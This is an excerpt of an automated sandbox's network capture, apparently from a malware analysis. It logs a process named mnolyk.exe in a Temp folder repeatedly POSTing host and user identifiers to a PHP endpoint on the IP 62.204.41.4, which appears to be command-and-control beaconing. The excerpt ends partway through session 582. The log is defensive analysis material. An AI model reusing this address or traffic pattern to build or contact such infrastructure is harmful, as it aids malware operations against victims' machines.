Feb 7, 2023 19:59:42.892925978 CET	807	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
563	192.168.2.5	50276	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:43.973222017 CET	808	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:44.040971994 CET	808	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
564	192.168.2.5	50277	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:44.403140068 CET	809	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:44.470019102 CET	809	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
565	192.168.2.5	50278	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:44.686906099 CET	810	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:44.751727104 CET	810	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
566	192.168.2.5	50279	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:44.920542002 CET	811	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:44.984456062 CET	811	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
567	192.168.2.5	50280	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:45.156579018 CET	812	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:45.222523928 CET	812	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
568	192.168.2.5	50281	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:45.414959908 CET	813	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:45.480309010 CET	813	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
569	192.168.2.5	50282	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:45.658355951 CET	814	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:45.722443104 CET	814	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.5	49762	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:20.088453054 CET	240	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:20.153971910 CET	240	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
570	192.168.2.5	50283	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:45.895142078 CET	815	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:45.960095882 CET	815	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
571	192.168.2.5	50284	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:46.139610052 CET	816	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:46.203732014 CET	816	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
572	192.168.2.5	50285	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:46.406219006 CET	817	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:46.468910933 CET	817	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
573	192.168.2.5	50286	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:46.657208920 CET	818	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:46.719027996 CET	818	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
574	192.168.2.5	50287	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:46.895270109 CET	819	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:46.958880901 CET	819	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
575	192.168.2.5	50288	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:47.126533985 CET	820	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:47.191839933 CET	820	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
576	192.168.2.5	50289	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:47.359030008 CET	821	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:47.423099041 CET	821	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
577	192.168.2.5	50290	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:47.592741966 CET	822	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:47.655107975 CET	822	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
578	192.168.2.5	50291	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:47.841888905 CET	823	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:47.904845953 CET	823	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
579	192.168.2.5	50292	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:48.086268902 CET	824	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:48.150856972 CET	824	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.5	49763	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:20.363784075 CET	244	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:20.427040100 CET	248	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
580	192.168.2.5	50293	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:48.325220108 CET	825	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:48.386796951 CET	825	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
581	192.168.2.5	50294	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:48.563160896 CET	826	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:48.627214909 CET	826	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
582	192.168.2.5	50295	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
